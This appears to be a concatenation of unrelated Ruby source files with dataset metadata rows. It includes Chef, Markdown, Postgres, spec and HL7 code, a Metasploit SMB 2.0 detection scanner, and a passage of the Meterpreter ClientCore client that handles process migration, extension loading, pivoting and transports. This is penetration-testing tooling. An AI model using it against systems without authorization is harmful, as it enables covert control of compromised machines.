# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# If the file is there, we don't care where it came from;
# otherwise, generate the keys.
#
# The reason we're not checking anything more specific here is that
# the preflight_bootstrap_validator checks ensure that either the key is
# present (that is, it was copied here), or will be generated because _this_
# is the node adding the pivotal user.
pivotal_key_path = "/etc/opscode/pivotal.pem"
new_pivotal = !File.exists?(pivotal_key_path)
pivotal_key = OpenSSL::PKey::RSA.generate(2048) if new_pivotal
# Setting at the top level so that we don't export this to chef-server-running.json
node.set['bootstrap']['superuser_public_key'] = pivotal_key.public_key.to_s if new_pivotal
file pivotal_key_path do
owner OmnibusHelper.new(node).ownership['owner']
group "root"
mode "0600"
content pivotal_key.to_pem.to_s if new_pivotal
sensitive true
end
webui_priv_key_path = "/etc/opscode/webui_priv.pem"
new_webui = !File.exists?(webui_priv_key_path)
webui_key = OpenSSL::PKey::RSA.generate(2048) if new_webui
file "/etc/opscode/webui_pub.pem" do
owner "root"
group "root"
mode "0644"
content webui_key.public_key.to_s if new_webui
end
file webui_priv_key_path do
owner OmnibusHelper.new(node).ownership['owner']
group "root"
mode "0600"
content webui_key.to_pem.to_s if new_webui
end
| 33.775862 | 90 | 0.764676 |
62db907c56302199d354075338f3495cbfdc80b6 | 627 | module Leg
module Markdown
class HTMLRouge < Redcarpet::Render::HTML
include Rouge::Plugins::Redcarpet
end
HTML_RENDERER = HTMLRouge.new(with_toc_data: true)
MARKDOWN_RENDERER = Redcarpet::Markdown.new(HTML_RENDERER, fenced_code_blocks: true)
def self.render(source)
html = MARKDOWN_RENDERER.render(source)
html = Redcarpet::Render::SmartyPants.render(html)
html.gsub!(/<\/code>‘/) { "</code>’" }
html.gsub!(/^\s*<h([23456]) id="([^"]+)">(.+)<\/h\d>$/) {
"<h#{$1} id=\"#{$2}\"><a href=\"##{$2}\">#{$3}</a></h#{$1}>"
}
html
end
end
end
| 29.857143 | 88 | 0.583732 |
911d13dd4141ed8a491314fba4572fb023b69023 | 250 | module Kubes::Docker::Strategy::Build
class Docker < Base
def perform
params = args.flatten.join(' ')
command = "docker build #{params}"
run_hooks("docker.rb", name: "build") do
sh(command)
end
end
end
end
| 20.833333 | 46 | 0.596 |
f82d8c17e6b1dd109cae8603e3a60e46adf3c48c | 93 | # desc "Explaining what the task does"
# task :acts_as_rateable do
# # Task goes here
# end | 23.25 | 38 | 0.709677 |
87431cde248017630e5051fad46ffd2dd904604b | 3,050 | # frozen_string_literal: false
# @!parse
# class ActiveRecord::Migration
# # Create a composite type
# #
# # @param [#to_s] name (nil) The qualified name of the type
# # @option options [#to_s] :comment (nil) The comment describing the constraint
# # @yield [t] the block with the type's definition
# # @yieldparam Object receiver of methods specifying the type
# # @return [void]
# #
# # ```ruby
# # create_composite_type "paint.colored_point" do |d|
# # d.column "x", "integer"
# # d.column "y", "integer"
# # d.column "color", "text", collation: "en_US"
# # d.comment <<~COMMENT
# # 2D point with color
# # COMMENT
# # end
# # ```
# #
# # It is always reversible.
# def create_composite_type(name, **options, &block); end
# end
module PGTrunk::Operations::CompositeTypes
# @private
class CreateCompositeType < Base
validates :force, :if_exists, :new_name, absence: true
from_sql do |_version|
<<~SQL
SELECT
t.oid,
(t.typnamespace::regnamespace || '.' || t.typname) AS name,
(
SELECT
json_agg(
json_build_object(
'name', a.attname,
'type', format_type(a.atttypid, a.atttypmod),
'collation', (
CASE
WHEN c.collnamespace != 'pg_catalog'::regnamespace
THEN c.collnamespace::regnamespace || '.' || c.collname
WHEN c.collname != 'default'
THEN c.collname
END
)
) ORDER BY a.attnum
)
FROM pg_attribute a
LEFT JOIN pg_collation c ON c.oid = a.attcollation
WHERE a.attrelid = t.typrelid
AND EXISTS (SELECT FROM pg_type WHERE a.atttypid = pg_type.oid)
) AS columns,
d.description AS comment
FROM pg_type t
JOIN pg_trunk e ON e.oid = t.oid
AND e.classid = 'pg_type'::regclass
LEFT JOIN pg_description d ON d.objoid = t.oid
AND d.classoid = 'pg_type'::regclass
WHERE t.typtype = 'c';
SQL
end
def to_sql(_version)
[create_type, *create_comment, register_type].join(" ")
end
def invert
DropCompositeType.new(**to_h)
end
private
def create_type
<<~SQL.squish
CREATE TYPE #{name.to_sql}
AS (#{columns.reject(&:change).map(&:to_sql).join(',')});
SQL
end
def create_comment
return if comment.blank?
"COMMENT ON TYPE #{name.to_sql} IS $comment$#{comment}$comment$;"
end
def register_type
<<~SQL.squish
INSERT INTO pg_trunk (oid, classid)
SELECT oid, 'pg_type'::regclass
FROM pg_type
WHERE typname = #{name.quoted}
AND typnamespace = #{name.namespace}
AND typtype = 'c'
ON CONFLICT DO NOTHING;
SQL
end
end
end
| 29.326923 | 84 | 0.540328 |
f8cc07f2d083b5f4643e2e304ae32f09401689f1 | 1,562 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe MemoizeBlock, '#memoize' do
let(:memoized_name) { nil }
let(:returned_value) { 'default' }
let(:action) { ->(returned) { return returned } }
def memoize_result
memoize(memoized_name) do
action.call(returned_value)
end
end
context 'given standard behavior' do
it 'memoizes the result' do
expect(action).to receive(:call).exactly(1).times
2.times.each { memoize_result }
end
it 'stores the result in a default ivar' do
expect { memoize_result }.to change { instance_variable_defined?('@_memoize_result') }.to(true)
end
end
context 'given a nil result' do
let(:returned_value) { nil }
it 'memoizes the result' do
expect(action).to receive(:call).exactly(1).times
2.times.each { memoize_result }
end
end
context 'given a custom ivar name' do
let(:memoized_name) { 'custom_ivar_name' }
it 'allows the ivar name to be defined' do
expect { memoize_result }.to change { instance_variable_defined?("@_#{memoized_name}") }.to(true)
end
end
context 'given an invalid custom ivar name' do
let(:memoized_name) { '@custom_ivar_name' }
it 'raises an error' do
expect { memoize_result }.to raise_error(StandardError, /invalid/)
end
end
context 'given an invalid method name' do
def memoize_result!
memoize { action.call }
end
it 'raises an error' do
expect { memoize_result! }.to raise_error(StandardError, /invalid/)
end
end
end
| 24.40625 | 103 | 0.670935 |
bf1ee7698781159b2ee23e51235675a2f72a5125 | 755 | module HealthSeven::V2_7_1
class Ndl < ::HealthSeven::DataType
# Name
attribute :name, Cnn, position: "NDL.1"
# Start Date/time
attribute :start_date_time, Dtm, position: "NDL.2"
# End Date/time
attribute :end_date_time, Dtm, position: "NDL.3"
# Point of Care
attribute :point_of_care, Is, position: "NDL.4"
# Room
attribute :room, Is, position: "NDL.5"
# Bed
attribute :bed, Is, position: "NDL.6"
# Facility
attribute :facility, Hd, position: "NDL.7"
# Location Status
attribute :location_status, Is, position: "NDL.8"
# Patient Location Type
attribute :patient_location_type, Is, position: "NDL.9"
# Building
attribute :building, Is, position: "NDL.10"
# Floor
attribute :floor, Is, position: "NDL.11"
end
end | 29.038462 | 57 | 0.692715 |
38566f64accf003aa84209513a39ed127880f0b0 | 2,868 | ##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
# Exploit mixins should go first
include Msf::Exploit::Remote::Tcp
# Scanner mixin should be near last
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
# Aliases for common classes
SIMPLE = Rex::Proto::SMB::SimpleClient
XCEPT = Rex::Proto::SMB::Exceptions
CONST = Rex::Proto::SMB::Constants
def initialize
super(
'Name' => 'SMB 2.0 Protocol Detection',
'Version' => '$Revision$',
'Description' => 'Detect systems that support the SMB 2.0 protocol',
'Author' => 'hdm',
'License' => MSF_LICENSE
)
register_options([ Opt::RPORT(445) ], self.class)
end
# Fingerprint a single host
def run_host(ip)
begin
connect
# The SMB 2 dialect must be there
dialects = ['PC NETWORK PROGRAM 1.0', 'LANMAN1.0', 'Windows for Workgroups 3.1a', 'LM1.2X002', 'LANMAN2.1', 'NT LM 0.12', 'SMB 2.002', 'SMB 2.???']
data = dialects.collect { |dialect| "\x02" + dialect + "\x00" }.join('')
pkt = Rex::Proto::SMB::Constants::SMB_NEG_PKT.make_struct
pkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_NEGOTIATE
pkt['Payload']['SMB'].v['Flags1'] = 0x18
pkt['Payload']['SMB'].v['Flags2'] = 0xc853
pkt['Payload'].v['Payload'] = data
pkt['Payload']['SMB'].v['ProcessID'] = rand(0x10000)
pkt['Payload']['SMB'].v['MultiplexID'] = rand(0x10000)
sock.put(pkt.to_s)
res = sock.get_once
if(res and res.index("\xfeSMB"))
if(res.length >= 124)
vers = res[72,2].unpack("CC").map{|c| c.to_s}.join(".")
ctime = Rex::Proto::SMB::Utils.time_smb_to_unix(*(res[108,8].unpack("VV").reverse))
btime = Rex::Proto::SMB::Utils.time_smb_to_unix(*(res[116,8].unpack("VV").reverse))
utime = ctime - btime
print_status("#{ip} supports SMB 2 [dialect #{vers}] and has been online for #{utime/3600} hours")
#Add Report
report_note(
:host => ip,
:proto => 'tcp',
:sname => 'smb2',
:port => rport,
:type => "supports SMB 2 [dialect #{vers}]",
:data => "supports SMB 2 [dialect #{vers}] and has been online for #{utime/3600} hours"
)
else
print_status("#{ip} supports SMB 2.0")
#Add Report
report_note(
:host => ip,
:proto => 'tcp',
:sname => 'smb2',
:port => rport,
:type => "supports SMB 2.0",
:data => "supports SMB 2.0"
)
end
end
rescue ::Rex::ConnectionError
rescue ::Exception => e
print_error("#{rhost}: #{e.class} #{e} #{e.backtrace}")
ensure
disconnect
end
end
end
| 28.117647 | 150 | 0.615063 |
1810e44ce706c7c7383830de4a00e36785999cee | 2,407 | # Copyright (c) 2018 Public Library of Science
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
require 'rails_helper'
describe TahiStandardTasks::ReviewerRecommendation do
describe "validations" do
let(:recommendation) { FactoryGirl.build(:reviewer_recommendation) }
it "is valid" do
expect(recommendation.valid?).to be(true)
end
it "requires an :first_name" do
recommendation.first_name = nil
expect(recommendation.valid?).to be(false)
end
it "requires an :last_name" do
recommendation.last_name = nil
expect(recommendation.valid?).to be(false)
end
it "requires an :email" do
recommendation.email = nil
expect(recommendation.valid?).to be(false)
end
end
describe "#paper" do
let(:recommendation) { FactoryGirl.create(:reviewer_recommendation) }
it "always proxies to paper" do
expect(recommendation.paper).to eq(recommendation.reviewer_recommendations_task.paper)
end
end
describe '#task' do
let!(:task) { FactoryGirl.create(:reviewer_recommendations_task) }
let!(:recommendation) do
FactoryGirl.create(
:reviewer_recommendation,
reviewer_recommendations_task: task
)
end
it 'always proxies to reviewer_recommendations_task' do
expect(recommendation.task)
.to eq(recommendation.reviewer_recommendations_task)
end
end
end
| 34.884058 | 92 | 0.738679 |
21c7be285a572bc1316062c15eeba5c1a23367cd | 28,684 | # -*- coding: binary -*-
require 'rex/post/meterpreter/packet'
require 'rex/post/meterpreter/core_ids'
require 'rex/post/meterpreter/extension'
require 'rex/post/meterpreter/extension_mapper'
require 'rex/post/meterpreter/client'
# certificate hash checking
require 'rex/socket/x509_certificate'
require 'openssl'
module Rex
module Post
module Meterpreter
###
#
# This class is responsible for providing the interface to the core
# client-side meterpreter API which facilitates the loading of extensions
# and the interaction with channels.
#
#
###
class ClientCore < Extension
METERPRETER_TRANSPORT_TCP = 0
METERPRETER_TRANSPORT_HTTP = 1
METERPRETER_TRANSPORT_HTTPS = 2
VALID_TRANSPORTS = {
'reverse_tcp' => METERPRETER_TRANSPORT_TCP,
'reverse_http' => METERPRETER_TRANSPORT_HTTP,
'reverse_https' => METERPRETER_TRANSPORT_HTTPS,
'bind_tcp' => METERPRETER_TRANSPORT_TCP
}
include Rex::Payloads::Meterpreter::UriChecksum
def self.extension_id
EXTENSION_ID_CORE
end
#
# Initializes the 'core' portion of the meterpreter client commands.
#
def initialize(client)
super(client, 'core')
end
##
#
# Core commands
#
##
#
# create a named pipe pivot
#
def create_named_pipe_pivot(opts)
request = Packet.create_request(COMMAND_ID_CORE_PIVOT_ADD)
request.add_tlv(TLV_TYPE_PIVOT_NAMED_PIPE_NAME, opts[:pipe_name])
c = Class.new(::Msf::Payload)
c.include(::Msf::Payload::Stager)
c.include(::Msf::Payload::TransportConfig)
# Include the appropriate reflective dll injection module for the target process architecture...
# Used to generate a reflective DLL when migrating. This is yet another
# argument for moving the meterpreter client into the Msf namespace.
if opts[:arch] == ARCH_X86
c.include(::Msf::Payload::Windows::MeterpreterLoader)
elsif opts[:arch] == ARCH_X64
c.include(::Msf::Payload::Windows::MeterpreterLoader_x64)
end
stage_opts = {
force_write_handle: true,
datastore: {
'PIPEHOST' => opts[:pipe_host],
'PIPENAME' => opts[:pipe_name]
}
}
stager = c.new()
stage_opts[:transport_config] = [stager.transport_config_reverse_named_pipe(stage_opts)]
stage = stager.stage_payload(stage_opts)
request.add_tlv(TLV_TYPE_PIVOT_STAGE_DATA, stage)
self.client.send_request(request)
end
#
# Get a list of loaded commands for the given extension.
#
# @param [String, Integer] extension Either the extension name or the extension ID to load the commands for.
#
# @return [Array<Integer>] An array of command IDs that are supported by the specified extension.
def get_loaded_extension_commands(extension)
request = Packet.create_request(COMMAND_ID_CORE_ENUMEXTCMD)
# handle 'core' as a special case since it's not a typical extension
extension = EXTENSION_ID_CORE if extension == 'core'
extension = Rex::Post::Meterpreter::ExtensionMapper.get_extension_id(extension) unless extension.is_a? Integer
request.add_tlv(TLV_TYPE_UINT, extension)
request.add_tlv(TLV_TYPE_LENGTH, COMMAND_ID_RANGE)
begin
response = self.client.send_packet_wait_response(request, self.client.response_timeout)
rescue
# In the case where orphaned shells call back with OLD copies of the meterpreter
# binaries, we end up with a case where this fails. So here we just return the
# empty list of supported commands.
return []
end
# No response?
if response.nil?
raise RuntimeError, 'No response was received to the core_enumextcmd request.', caller
elsif response.result != 0
# This case happens when the target doesn't support the core_enumextcmd message.
# If this is the case, then we just want to ignore the error and return an empty
# list. This will force the caller to load any required modules.
return []
end
commands = []
response.each(TLV_TYPE_UINT) { |c|
commands << c.value
}
commands
end
def transport_list
request = Packet.create_request(COMMAND_ID_CORE_TRANSPORT_LIST)
response = client.send_request(request)
result = {
:session_exp => response.get_tlv_value(TLV_TYPE_TRANS_SESSION_EXP),
:transports => []
}
response.each(TLV_TYPE_TRANS_GROUP) { |t|
result[:transports] << {
:url => t.get_tlv_value(TLV_TYPE_TRANS_URL),
:comm_timeout => t.get_tlv_value(TLV_TYPE_TRANS_COMM_TIMEOUT),
:retry_total => t.get_tlv_value(TLV_TYPE_TRANS_RETRY_TOTAL),
:retry_wait => t.get_tlv_value(TLV_TYPE_TRANS_RETRY_WAIT),
:ua => t.get_tlv_value(TLV_TYPE_TRANS_UA),
:proxy_host => t.get_tlv_value(TLV_TYPE_TRANS_PROXY_HOST),
:proxy_user => t.get_tlv_value(TLV_TYPE_TRANS_PROXY_USER),
:proxy_pass => t.get_tlv_value(TLV_TYPE_TRANS_PROXY_PASS),
:cert_hash => t.get_tlv_value(TLV_TYPE_TRANS_CERT_HASH),
:custom_headers => t.get_tlv_value(TLV_TYPE_TRANS_HEADERS)
}
}
result
end
#
# Set associated transport timeouts for the currently active transport.
#
def set_transport_timeouts(opts={})
request = Packet.create_request(COMMAND_ID_CORE_TRANSPORT_SET_TIMEOUTS)
if opts[:session_exp]
request.add_tlv(TLV_TYPE_TRANS_SESSION_EXP, opts[:session_exp])
end
if opts[:comm_timeout]
request.add_tlv(TLV_TYPE_TRANS_COMM_TIMEOUT, opts[:comm_timeout])
end
if opts[:retry_total]
request.add_tlv(TLV_TYPE_TRANS_RETRY_TOTAL, opts[:retry_total])
end
if opts[:retry_wait]
request.add_tlv(TLV_TYPE_TRANS_RETRY_WAIT, opts[:retry_wait])
end
response = client.send_request(request)
{
:session_exp => response.get_tlv_value(TLV_TYPE_TRANS_SESSION_EXP),
:comm_timeout => response.get_tlv_value(TLV_TYPE_TRANS_COMM_TIMEOUT),
:retry_total => response.get_tlv_value(TLV_TYPE_TRANS_RETRY_TOTAL),
:retry_wait => response.get_tlv_value(TLV_TYPE_TRANS_RETRY_WAIT)
}
end
#
# Loads a library on the remote meterpreter instance. This method
# supports loading both extension and non-extension libraries and
# also supports loading libraries from memory or disk depending
# on the flags that are specified
#
# Supported flags:
#
# LibraryFilePath
# The path to the library that is to be loaded
#
# LibraryFileImage
# Binary object containing the library to be loaded
# (can be used instead of LibraryFilePath)
#
# TargetFilePath
# The target library path when uploading
#
# UploadLibrary
# Indicates whether or not the library should be uploaded
#
# SaveToDisk
# Indicates whether or not the library should be saved to disk
# on the remote machine
#
# Extension
# Indicates whether or not the library is a meterpreter extension
#
def load_library(opts)
library_path = opts['LibraryFilePath']
library_image = opts['LibraryFileImage']
target_path = opts['TargetFilePath']
load_flags = LOAD_LIBRARY_FLAG_LOCAL
# No library path, no cookie.
if library_path.nil? && library_image.nil?
raise ArgumentError, 'No library file path or image was supplied', caller
end
# Set up the proper loading flags
if opts['UploadLibrary']
load_flags &= ~LOAD_LIBRARY_FLAG_LOCAL
end
if opts['SaveToDisk']
load_flags |= LOAD_LIBRARY_FLAG_ON_DISK
end
if opts['Extension']
load_flags |= LOAD_LIBRARY_FLAG_EXTENSION
end
# Create a request packet
request = Packet.create_request(COMMAND_ID_CORE_LOADLIB)
# If we must upload the library, do so now
if (load_flags & LOAD_LIBRARY_FLAG_LOCAL) != LOAD_LIBRARY_FLAG_LOCAL
if library_image.nil?
# Caller did not provide the image, load it from the path
library_image = ''
::File.open(library_path, 'rb') { |f|
library_image = f.read
}
end
if library_image
request.add_tlv(TLV_TYPE_DATA, library_image, false, client.capabilities[:zlib])
else
raise RuntimeError, "Failed to serialize library #{library_path}.", caller
end
# If it's an extension we're dealing with, rename the library
# path of the local and target so that it gets loaded with a random
# name
if opts['Extension']
if client.binary_suffix and client.binary_suffix.size > 1
/(.*)\.(.*)/.match(library_path)
suffix = $2
elsif client.binary_suffix.size == 1
suffix = client.binary_suffix[0]
else
suffix = client.binary_suffix
end
library_path = "ext#{rand(1000000)}.#{suffix}"
target_path = "/tmp/#{library_path}"
end
end
# Add the base TLVs
request.add_tlv(TLV_TYPE_LIBRARY_PATH, library_path)
request.add_tlv(TLV_TYPE_FLAGS, load_flags)
if !target_path.nil?
request.add_tlv(TLV_TYPE_TARGET_PATH, target_path)
end
# Transmit the request and wait the default timeout seconds for a response
response = self.client.send_packet_wait_response(request, self.client.response_timeout)
# No response?
if response.nil?
raise RuntimeError, 'No response was received to the core_loadlib request.', caller
elsif response.result != 0
raise RuntimeError, "The core_loadlib request failed with result: #{response.result}.", caller
end
commands = []
response.each(TLV_TYPE_UINT) { |c|
commands << c.value
}
commands
end
#
# Loads a meterpreter extension on the remote server instance and
# initializes the client-side extension handlers
#
# Module
# The module that should be loaded
#
# LoadFromDisk
# Indicates that the library should be loaded from disk, not from
# memory on the remote machine
#
def use(mod, opts = { })
if mod.nil?
raise RuntimeError, "No modules were specified", caller
end
modnameprovided = mod
suffix = nil
if not client.binary_suffix
suffix = ''
elsif client.binary_suffix.size > 1
client.binary_suffix.each { |s|
if (mod =~ /(.*)\.#{s}/ )
mod = $1
suffix = s
break
end
}
else
suffix = client.binary_suffix.first
end
# Query the remote instance to see if commands for the extension are
# already loaded
commands = get_loaded_extension_commands(mod.downcase)
# if there are existing commands for the given extension, then we can use
# what's already there
unless commands.length > 0
image = nil
path = nil
# If client.sys isn't setup, it's a Windows meterpreter
if client.respond_to?(:sys) && !client.sys.config.sysinfo['BuildTuple'].blank?
# Query the payload gem directly for the extension image
image = MetasploitPayloads::Mettle.load_extension(client.sys.config.sysinfo['BuildTuple'], mod.downcase, suffix)
else
# Get us to the installation root and then into data/meterpreter, where
# the file is expected to be
modname = "ext_server_#{mod.downcase}"
path = MetasploitPayloads.meterpreter_path(modname, suffix)
if opts['ExtensionPath']
path = ::File.expand_path(opts['ExtensionPath'])
end
end
if path.nil? and image.nil?
if Rex::Post::Meterpreter::ExtensionMapper.get_extension_names.include?(mod.downcase)
raise RuntimeError, "The \"#{mod.downcase}\" extension is not supported by this Meterpreter type (#{client.session_type})", caller
else
raise RuntimeError, "No module of the name #{modnameprovided} found", caller
end
end
# Load the extension DLL
commands = load_library(
'LibraryFilePath' => path,
'LibraryFileImage' => image,
'UploadLibrary' => true,
'Extension' => true,
'SaveToDisk' => opts['LoadFromDisk'])
end
# wire the commands into the client
client.add_extension(mod, commands)
return true
end
#
# Set the UUID on the target session.
#
def set_uuid(uuid)
request = Packet.create_request(COMMAND_ID_CORE_SET_UUID)
request.add_tlv(TLV_TYPE_UUID, uuid.to_raw)
client.send_request(request)
true
end
#
# Set the session GUID on the target session.
#
def set_session_guid(guid)
request = Packet.create_request(COMMAND_ID_CORE_SET_SESSION_GUID)
request.add_tlv(TLV_TYPE_SESSION_GUID, guid)
client.send_request(request)
true
end
#
# Get the session GUID from the target session.
#
def get_session_guid(timeout=nil)
request = Packet.create_request(COMMAND_ID_CORE_GET_SESSION_GUID)
args = [request]
args << timeout if timeout
response = client.send_request(*args)
response.get_tlv_value(TLV_TYPE_SESSION_GUID)
end
#
# Get the machine ID from the target session.
#
def machine_id(timeout=nil)
request = Packet.create_request(COMMAND_ID_CORE_MACHINE_ID)
args = [request]
args << timeout if timeout
response = client.send_request(*args)
mid = response.get_tlv_value(TLV_TYPE_MACHINE_ID)
# Normalise the format of the incoming machine id so that it's consistent
# regardless of case and leading/trailing spaces. This means that the
# individual meterpreters don't have to care.
# Note that the machine ID may be blank or nil and that is OK
Rex::Text.md5(mid.to_s.downcase.strip)
end
#
# Get the current native arch from the target session.
#
def native_arch(timeout=nil)
# Not all meterpreter implementations support this
request = Packet.create_request(COMMAND_ID_CORE_NATIVE_ARCH)
args = [ request ]
args << timeout if timeout
response = client.send_request(*args)
response.get_tlv_value(TLV_TYPE_STRING)
end
#
# Remove a transport from the session based on the provided options.
#
def transport_remove(opts={})
request = transport_prepare_request(COMMAND_ID_CORE_TRANSPORT_REMOVE, opts)
return false unless request
client.send_request(request)
return true
end
#
# Add a transport to the session based on the provided options.
#
def transport_add(opts={})
request = transport_prepare_request(COMMAND_ID_CORE_TRANSPORT_ADD, opts)
return false unless request
client.send_request(request)
return true
end
#
# Change the currently active transport on the session.
#
def transport_change(opts={})
request = transport_prepare_request(COMMAND_ID_CORE_TRANSPORT_CHANGE, opts)
return false unless request
client.send_request(request)
return true
end
#
# Sleep the current session for the given number of seconds.
#
def transport_sleep(seconds)
return false if seconds == 0
request = Packet.create_request(COMMAND_ID_CORE_TRANSPORT_SLEEP)
# we're reusing the comms timeout setting here instead of
# creating a whole new TLV value
request.add_tlv(TLV_TYPE_TRANS_COMM_TIMEOUT, seconds)
client.send_request(request)
return true
end
#
# Change the active transport to the next one in the transport list.
#
def transport_next
request = Packet.create_request(COMMAND_ID_CORE_TRANSPORT_NEXT)
client.send_request(request)
return true
end
#
# Change the active transport to the previous one in the transport list.
#
def transport_prev
request = Packet.create_request(COMMAND_ID_CORE_TRANSPORT_PREV)
client.send_request(request)
return true
end
#
# Enable the SSL certificate has verificate
#
def enable_ssl_hash_verify
# Not supported unless we have a socket with SSL enabled
return nil unless self.client.sock.type? == 'tcp-ssl'
request = Packet.create_request(COMMAND_ID_CORE_TRANSPORT_SETCERTHASH)
hash = Rex::Text.sha1_raw(self.client.sock.sslctx.cert.to_der)
request.add_tlv(TLV_TYPE_TRANS_CERT_HASH, hash)
client.send_request(request)
return hash
end
#
# Disable the SSL certificate has verificate
#
def disable_ssl_hash_verify
# Not supported unless we have a socket with SSL enabled
return nil unless self.client.sock.type? == 'tcp-ssl'
request = Packet.create_request(COMMAND_ID_CORE_TRANSPORT_SETCERTHASH)
# send an empty request to disable it
client.send_request(request)
return true
end
#
# Attempt to get the SSL hash being used for verificaton (if any).
#
# @return 20-byte sha1 hash currently being used for verification.
#
def get_ssl_hash_verify
# Not supported unless we have a socket with SSL enabled
return nil unless self.client.sock.type? == 'tcp-ssl'
request = Packet.create_request(COMMAND_ID_CORE_TRANSPORT_GETCERTHASH)
response = client.send_request(request)
return response.get_tlv_value(TLV_TYPE_TRANS_CERT_HASH)
end
#
# Migrates the meterpreter instance to the process specified
# by pid. The connection to the server remains established.
#
def migrate(target_pid, writable_dir = nil, opts = {})
keepalive = client.send_keepalives
client.send_keepalives = false
target_process = nil
current_process = nil
# Load in the stdapi extension if not allready present so we can determine the target pid architecture...
client.core.use('stdapi') if not client.ext.aliases.include?('stdapi')
current_pid = client.sys.process.getpid
# Find the current and target process instances
client.sys.process.processes.each { | p |
if p['pid'] == target_pid
target_process = p
elsif p['pid'] == current_pid
current_process = p
end
}
# We cant migrate into a process that does not exist.
unless target_process
raise RuntimeError, 'Cannot migrate into non existent process', caller
end
# We cannot migrate into a process that we are unable to open
# On linux, arch is empty even if we can access the process
if client.platform == 'windows'
if target_process['arch'] == nil || target_process['arch'].empty?
raise RuntimeError, "Cannot migrate into this process (insufficient privileges)", caller
end
end
# And we also cannot migrate into our own current process...
if current_process['pid'] == target_process['pid']
raise RuntimeError, 'Cannot migrate into current process', caller
end
migrate_stub = generate_migrate_stub(target_process)
migrate_payload = generate_migrate_payload(target_process)
# Build the migration request
request = Packet.create_request(COMMAND_ID_CORE_MIGRATE)
request.add_tlv(TLV_TYPE_MIGRATE_PID, target_pid)
request.add_tlv(TLV_TYPE_MIGRATE_PAYLOAD, migrate_payload, false, client.capabilities[:zlib])
request.add_tlv(TLV_TYPE_MIGRATE_STUB, migrate_stub, false, client.capabilities[:zlib])
if target_process['arch'] == ARCH_X64
request.add_tlv( TLV_TYPE_MIGRATE_ARCH, 2 ) # PROCESS_ARCH_X64
else
request.add_tlv( TLV_TYPE_MIGRATE_ARCH, 1 ) # PROCESS_ARCH_X86
end
# if we change architecture, we need to change UUID as well
if current_process['arch'] != target_process['arch']
client.payload_uuid.arch = target_process['arch']
request.add_tlv( TLV_TYPE_UUID, client.payload_uuid.to_raw )
end
# Send the migration request. Timeout can be specified by the caller, or set to a min
# of 60 seconds.
timeout = [(opts[:timeout] || 0), 60].max
client.send_request(request, timeout)
# Post-migration the session doesn't have encryption any more.
# Set the TLV key to nil to make sure that the old key isn't used
# at all.
client.tlv_enc_key = nil
if client.passive_service
# Sleep for 5 seconds to allow the full handoff, this prevents
# the original process from stealing our loadlib requests
::IO.select(nil, nil, nil, 5.0)
elsif client.pivot_session.nil?
# Prevent new commands from being sent while we finish migrating
client.comm_mutex.synchronize do
# Disable the socket request monitor
client.monitor_stop
###
# Now communicating with the new process
###
# only renegotiate SSL if the session had support for it in the
# first place!
if client.supports_ssl?
# If renegotiation takes longer than a minute, it's a pretty
# good bet that migration failed and the remote side is hung.
# Since we have the comm_mutex here, we *must* release it to
# keep from hanging the packet dispatcher thread, which results
# in blocking the entire process.
begin
Timeout.timeout(timeout) do
# Renegotiate SSL over this socket
client.swap_sock_ssl_to_plain()
client.swap_sock_plain_to_ssl()
end
rescue TimeoutError
client.alive = false
return false
end
end
# Restart the socket monitor
client.monitor_socket
end
end
# Renegotiate TLV encryption on the migrated session
secure
# Load all the extensions that were loaded in the previous instance (using the correct platform/binary_suffix)
client.ext.aliases.keys.each { |e|
client.core.use(e)
}
# Restore session keep-alives
client.send_keepalives = keepalive
return true
end
def secure
client.tlv_enc_key = negotiate_tlv_encryption
end
#
# Shuts the session down
#
def shutdown
request = Packet.create_request(COMMAND_ID_CORE_SHUTDOWN)
if client.passive_service
# If this is a HTTP/HTTPS session we need to wait a few seconds
# otherwise the session may not receive the command before we
# kill the handler. This could be improved by the server side
# sending a reply to shutdown first.
self.client.send_packet_wait_response(request, 10)
else
# If this is a standard TCP session, send and forget.
self.client.send_packet(request)
end
true
end
#
# Indicates if the given transport is a valid transport option.
#
def valid_transport?(transport)
return false if transport.nil?
VALID_TRANSPORTS.has_key?(transport.downcase)
end
#
# Negotiates the use of encryption at the TLV level
#
def negotiate_tlv_encryption
sym_key = nil
rsa_key = OpenSSL::PKey::RSA.new(2048)
rsa_pub_key = rsa_key.public_key
request = Packet.create_request(COMMAND_ID_CORE_NEGOTIATE_TLV_ENCRYPTION)
request.add_tlv(TLV_TYPE_RSA_PUB_KEY, rsa_pub_key.to_der)
begin
response = client.send_request(request)
key_enc = response.get_tlv_value(TLV_TYPE_ENC_SYM_KEY)
key_type = response.get_tlv_value(TLV_TYPE_SYM_KEY_TYPE)
if key_enc
sym_key = rsa_key.private_decrypt(key_enc, OpenSSL::PKey::RSA::PKCS1_PADDING)
else
sym_key = response.get_tlv_value(TLV_TYPE_SYM_KEY)
end
rescue OpenSSL::PKey::RSAError, Rex::Post::Meterpreter::RequestError
# 1) OpenSSL error may be due to padding issues (or something else)
# 2) Request error probably means the request isn't supported, so fallback to plain
end
{
key: sym_key,
type: key_type
}
